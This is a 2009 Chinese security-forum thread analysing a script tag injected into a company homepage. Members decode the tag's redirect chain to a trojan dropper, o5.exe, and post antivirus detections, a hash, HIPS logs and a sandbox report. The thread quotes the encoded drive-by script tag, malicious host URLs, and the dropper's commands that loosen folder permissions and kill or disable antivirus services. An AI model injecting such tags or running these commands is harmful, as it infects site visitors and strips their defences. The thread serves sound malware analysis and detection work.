收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 据报恶意地址
12下一页
返回列表 发新帖
查看: 4722|回复: 15
收起左侧

[病毒样本] 据报恶意地址

[复制链接]
pan66000
发表于 2009-6-21 12:08:24 | 显示全部楼层 |阅读模式
<script src=http://%77%76%67%37%2E%63%6E></script>
多谢大家,希望卡巴可以识别这一串坏东西。

[ 本帖最后由 pan66000 于 2009-6-21 18:45 编辑 ]
回复

举报

sam.to
发表于 2009-6-21 12:20:47 | 显示全部楼层
什么网址來的
回复

举报

pan66000
 楼主| 发表于 2009-6-21 12:25:31 | 显示全部楼层
来自于公司网站,在主页代码的最后一行,怎么来的原因不明。
回复

举报

taoyuan237
发表于 2009-6-21 12:32:49 | 显示全部楼层
关于:hxxp://ruyi-8.cn/ec2.css解密的日志(全体输出 -  37):
Level  1>http://%77%76%67%37%2e%63%6e
Level  1>http://wvg7.cn
Level  2>http://www.ya-d1.cn/5/index.html
Level  3>http://www.linezing.com
Level  3>http://js.tongji.linezing.com/1157786/tongji.js
Level  3>http://www.linezing.com
Level  3>http://js.tongji.linezing.com/1157776/tongji.js
Level  3>http://www.w2photo.cn/5/new.html
Level  4>http://www.w2photo.cn/5/ct122121.htm
Level  5>http://www.w2photo.cn/5/real1.js
Level  5>http://www.w2photo.cn/5/real.js
Level  5>http://www.w2photo.cn/5/turl.js
Level  6>http://www.down2sun.cn/1/o5.exe
Level  4>http://www.w2photo.cn/5/ctlb.htm
Level  5>http://www.w2photo.cn/5/e.css
Level  5>http://www.w2photo.cn/5/do.css
Level  6>http://www.down2sun.cn/1/o5.exe
Level  4>http://www.w2photo.cn/5/ctqm.htm
Level  4>http://www.w2photo.cn/5/ctxxz.htm
Level  5>http://www.w2photo.cn/5/d.js
Level  5>http://www.w2photo.cn/5/b.js
Level  5>http://www.w2photo.cn/5/ytvod.js
Level  4>http://www.w2photo.cn/5/ctvod.htm
Level  5>http://www.w2photo.cn/5/d.js
Level  5>http://www.w2photo.cn/5/b.js
Level  5>http://www.w2photo.cn/5/ytvod.js
Level  4>http://www.w2photo.cn/5/z.htm
Level  5>http://www.w2photo.cn/5/z.css
Level  5>http://www.w2photo.cn/5/do.css
Level  6>http://www.down2sun.cn/1/o5.exe
Level  4>http://www.w2photo.cn/5/ctfl.htm
Level  4>http://www.w2photo.cn/5/ct14.htm
Level  5>http://www.w2photo.cn/5/16.js
Level  5>http://www.w2photo.cn/5/15.js
Level  5>http://www.w2photo.cn/5/14.js
Level  6>http://www.down2sun.cn/1/o5.exe
Level  3>http://www.google.cn
日志由 Redoce1.9第68次修正版于 2009/6/21 12:32:06 生成。
回复

举报

sam.to
发表于 2009-6-21 12:35:22 | 显示全部楼层

回复 4楼 taoyuan237 的帖子

卡巴报那个exe(Trojan-Dropper.Win32.Mudrop.arv),不知其他文件是否清潔
回复

举报

红心王子
发表于 2009-6-21 12:41:36 | 显示全部楼层
md5:f35ccbb10b4e966e5f9263c9fe61cbb2 o5.exe

2009-6-21 12:39:49 1245559189 Administrator 3448 Sign of "Win32:Rootkit-gen [Rtk]" has been found in "C:\Downloads\o5.exe\[NsPack]\[Embedded_Ra#043ec]\[Embedded_Ia#6690]" file.  



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

lorchid
发表于 2009-6-21 12:45:50 | 显示全部楼层
和NOD32过不去

创建新进程    阻止
进程: j:\download\!warning\o5.exe
目标: c:\windows\system32\cmd.exe
命令行: cmd /c cacls C:\WINDOWS /e /p everyone:f
规则: [应用程序组]AF00_所有程序过滤 -> [子应用程序]AD_黑名单程序

创建新进程    阻止
进程: j:\download\!warning\o5.exe
目标: c:\windows\system32\cmd.exe
命令行: cmd /c cacls "C:\DOCUME~1\Lorchid\LOCALS~1\Temp\" /e /p everyone:f
规则: [应用程序组]AF00_所有程序过滤 -> [子应用程序]AD_黑名单程序

创建新进程    阻止
进程: j:\download\!warning\o5.exe
目标: c:\windows\system32\cmd.exe
命令行: cmd /c sc config ekrn start= disabled
规则: [应用程序组]AF00_所有程序过滤 -> [子应用程序]AD_黑名单程序

创建新进程    阻止
进程: j:\download\!warning\o5.exe
目标: c:\windows\system32\cmd.exe
命令行: cmd /c taskkill /im ekrn.exe /f
规则: [应用程序组]AF00_所有程序过滤 -> [子应用程序]AD_黑名单程序

创建新进程    阻止
进程: j:\download\!warning\o5.exe
目标: c:\windows\system32\cmd.exe
命令行: cmd /c taskkill /im egui.exe /f
规则: [应用程序组]AF00_所有程序过滤 -> [子应用程序]AD_黑名单程序

创建新进程    阻止
进程: j:\download\!warning\o5.exe
目标: c:\windows\system32\cmd.exe
命令行: cmd /c taskkill /im ScanFrm.exe /f
规则: [应用程序组]AF00_所有程序过滤 -> [子应用程序]AD_黑名单程序

创建文件    阻止
进程: j:\download\!warning\o5.exe
目标: C:\WINDOWS\system32\func.dll
规则: [应用程序组]AF00_所有程序过滤 -> [文件组]FD系统执行文件

创建新进程    阻止
进程: j:\download\!warning\o5.exe
目标: c:\windows\system32\rundll32.exe
命令行: rundll32.exe func.dll, droqp
规则: [应用程序]*

创建文件    阻止
进程: j:\download\!warning\o5.exe
目标: C:\WINDOWS\phpi.dll
规则: [应用程序组]AF00_所有程序过滤 -> [文件组]FD系统执行文件
回复

举报

悠柚
发表于 2009-6-21 13:10:10 | 显示全部楼层
名称:
      Trojan.Win32.KillAV.sx
文件:
      D:\TDDOWNLOAD\O5.EXE 是木马,是否要删除此文件?
回复

举报

xyao
发表于 2009-6-21 13:15:52 | 显示全部楼层
原帖由 红心王子 于 2009-6-21 12:41 发表
md5:f35ccbb10b4e966e5f9263c9fe61cbb2 o5.exe

2009-6-21 12:39:49 1245559189 Administrator 3448 Sign of "Win32:Rootkit-gen [Rtk]" has been found in "C:\Downloads\o5.exe\[NsPack]\[Embedded_Ra#043ec]\[ ...


微点

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

jochelliu
发表于 2009-6-21 14:41:31 | 显示全部楼层
• Values Created
Name Type Size Value
LM\System\CurrentControlSet\Services\UPDATEDATA\DisplayName REG_SZ 22 "UPDATEDATA"
LM\System\CurrentControlSet\Services\UPDATEDATA\Enum\0 REG_SZ 56 "Root\LEGACY_UPDATEDATA\0000"
LM\System\CurrentControlSet\Services\UPDATEDATA\Enum\Count REG_DWORD 4 0x1
LM\System\CurrentControlSet\Services\UPDATEDATA\Enum\NextInstance REG_DWORD 4 0x1
LM\System\CurrentControlSet\Services\UPDATEDATA\ErrorControl REG_DWORD 4 0x0
LM\System\CurrentControlSet\Services\UPDATEDATA\ImagePath REG_EXPAND_SZ 86 "\??\C:\WINDOWS\system32\drivers\acpiec.sys"
LM\System\CurrentControlSet\Services\UPDATEDATA\Security\Security REG_BINARY 168 ?
LM\System\CurrentControlSet\Services\UPDATEDATA\Start REG_DWORD 4 0x3
LM\System\CurrentControlSet\Services\UPDATEDATA\Type REG_DWORD 4 0x1

• Files Created
Name Size Last Write Time Creation Time Last Access Time Attr
C:\WINDOWS\system32\func.dll 36864 2009.01.12 14:48:00.968 2009.01.12 14:48:00.921 2009.01.12 14:48:00.921 0x20

• Files Changed
Name Size Last Write Time Creation Time Last Access Time Attr
C:\WINDOWS\system32\drivers\acpiec.sys 11648/13056 2007.07.27 12:00:00.000/2009.01.12 14:48:03.203 2007.07.27 12:00:00.000/2007.07.27 12:00:00.000 2008.08.01 04:46:06.655/2008.08.01 04:46:06.655 0x20/0x20

• Drivers Loaded
Base Size Flags Image Name
0xf8dfa000 0x4000 0x9104000 \??\C:\WINDOWS\system32\drivers\acpiec.sys

• Drivers Unloaded
• Processes Created
PId Process Name Image Name
0x420 rundll32.exe C:\WINDOWS\system32\rundll32.exe
0x770 wmiprvse.exe C:\WINDOWS\system32\wbem\wmiprvse.exe

• Processes Terminated
• Threads Created
PId Process Name TId Start Start Mem Win32 Start Win32 Start Mem
0x25c csrss.exe 0x7e4 0x75b44616 MEM_IMAGE 0x0 MEM_PRIVATE
0x274 winlogon.exe 0x444 0x7c810856 MEM_IMAGE 0x76c74a65 MEM_IMAGE
0x274 winlogon.exe 0x484 0x7c810856 MEM_IMAGE 0x77a8964a MEM_IMAGE
0x344 svchost.exe 0x170 0x7c810856 MEM_IMAGE 0x7c910760 MEM_IMAGE
0x404 svchost.exe 0xdc 0x7c810856 MEM_IMAGE 0x606b73ae MEM_IMAGE
0x404 svchost.exe 0x298 0x7c810856 MEM_IMAGE 0x762cf010 MEM_IMAGE
0x404 svchost.exe 0x32c 0x7c810856 MEM_IMAGE 0x762cf010 MEM_IMAGE
0x404 svchost.exe 0x360 0x7c810856 MEM_IMAGE 0x762cf0a3 MEM_IMAGE
0x404 svchost.exe 0x364 0x7c810856 MEM_IMAGE 0x4156 MEM_FREE
0x404 svchost.exe 0x3fc 0x7c810856 MEM_IMAGE 0x606b73ae MEM_IMAGE
0x404 svchost.exe 0x42c 0x7c810856 MEM_IMAGE 0x774f319a MEM_IMAGE
0x404 svchost.exe 0x46c 0x7c810856 MEM_IMAGE 0x606b73ae MEM_IMAGE
0x404 svchost.exe 0x470 0x7c810856 MEM_IMAGE 0x7529e44b MEM_IMAGE
0x404 svchost.exe 0x4c4 0x7c810856 MEM_IMAGE 0x7c929fae MEM_IMAGE
0x404 svchost.exe 0x4e4 0x7c810856 MEM_IMAGE 0x7529edb3 MEM_IMAGE
0x404 svchost.exe 0x63c 0x7c810856 MEM_IMAGE 0x40dd MEM_FREE
0x404 svchost.exe 0x744 0x7c810856 MEM_IMAGE 0x762cf010 MEM_IMAGE
0x404 svchost.exe 0x7d4 0x7c810856 MEM_IMAGE 0x606b73ae MEM_IMAGE
0x420 rundll32.exe 0x674 0x7c810867 MEM_IMAGE 0x1001bdc MEM_IMAGE
0x770 wmiprvse.exe 0x380 0x7c810856 MEM_IMAGE 0x5f771c49 MEM_IMAGE
0x770 wmiprvse.exe 0x400 0x7c810856 MEM_IMAGE 0x774f319a MEM_IMAGE
0x770 wmiprvse.exe 0x4a8 0x7c810856 MEM_IMAGE 0x0 MEM_FREE
0x770 wmiprvse.exe 0x4c8 0x7c810856 MEM_IMAGE 0x77e76bf0 MEM_IMAGE
0x770 wmiprvse.exe 0x578 0x7c810856 MEM_IMAGE 0x100ce42 MEM_IMAGE
0x770 wmiprvse.exe 0x66c 0x7c810856 MEM_IMAGE 0x716df2be MEM_IMAGE
0x770 wmiprvse.exe 0x760 0x7c810856 MEM_IMAGE 0x0 MEM_FREE
0x770 wmiprvse.exe 0x794 0x7c810856 MEM_IMAGE 0x0 MEM_FREE
0x770 wmiprvse.exe 0x7c0 0x7c810867 MEM_IMAGE 0x1024636 MEM_IMAGE

• Modules Loaded
PId Process Name Base Size Flags Image Name
0x344 svchost.exe 0x76fd0000 0x7f000 0x800c4004 C:\WINDOWS\system32\CLBCATQ.DLL
0x344 svchost.exe 0x77050000 0xc5000 0x800c4006 C:\WINDOWS\system32\COMRes.dll
0x344 svchost.exe 0x77b40000 0x22000 0x800c4004 C:\WINDOWS\system32\Apphelp.dll
0x404 svchost.exe 0x73d30000 0x17000 0x800c4004 C:\WINDOWS\system32\wbem\wbemcons.dll
0x404 svchost.exe 0x74ed0000 0xe000 0x80084004 C:\WINDOWS\system32\wbem\wbemsvc.dll

• Windows Api Calls
PId Image Name Address Function ( Parameters ) | Return Value
0x420 C:\WINDOWS\system32\rundll32.exe 0x923e57 CreateServiceA(hSCManager: 0x98e08, lpServiceName: "UPDATEDATA", lpDisplayName: "UPDATEDATA", dwDesiredAccess: 0x10, dwServiceType: 0x1, dwStartType: 0x3, dwErrorControl: 0x0, lpBinaryPathName: "C:\WINDOWS\system32\drivers\acpiec.sys", lpLoadOrderGroup: "(null)", lpdwTagId: 0x0, lpDependencies: 0x0, lpServiceStartName: "(null)", lpPassword: 0x0)|0x9b0b8

• Verdict
Auto Analysis Verdict
Rated as Suspicious

• Description
Suspicious Actions Detected
Creates files in windows system directory
Creates system services or drivers
Load system drivers
Patches system files
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-9-18 09:13 , Processed in 0.137918 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表